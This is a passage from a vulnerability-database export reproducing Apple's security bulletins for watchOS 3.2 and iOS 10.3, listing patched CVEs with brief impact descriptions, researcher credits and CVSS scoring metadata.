[CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-04T03:34:42", "title": "About the security content of watchOS 3.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2461", "CVE-2017-2450", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2379", "CVE-2017-2428", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2451", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2458", "CVE-2017-2401", "CVE-2017-2467", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2440", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-04-04T03:34:42", "id": "APPLE:HT207602", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable 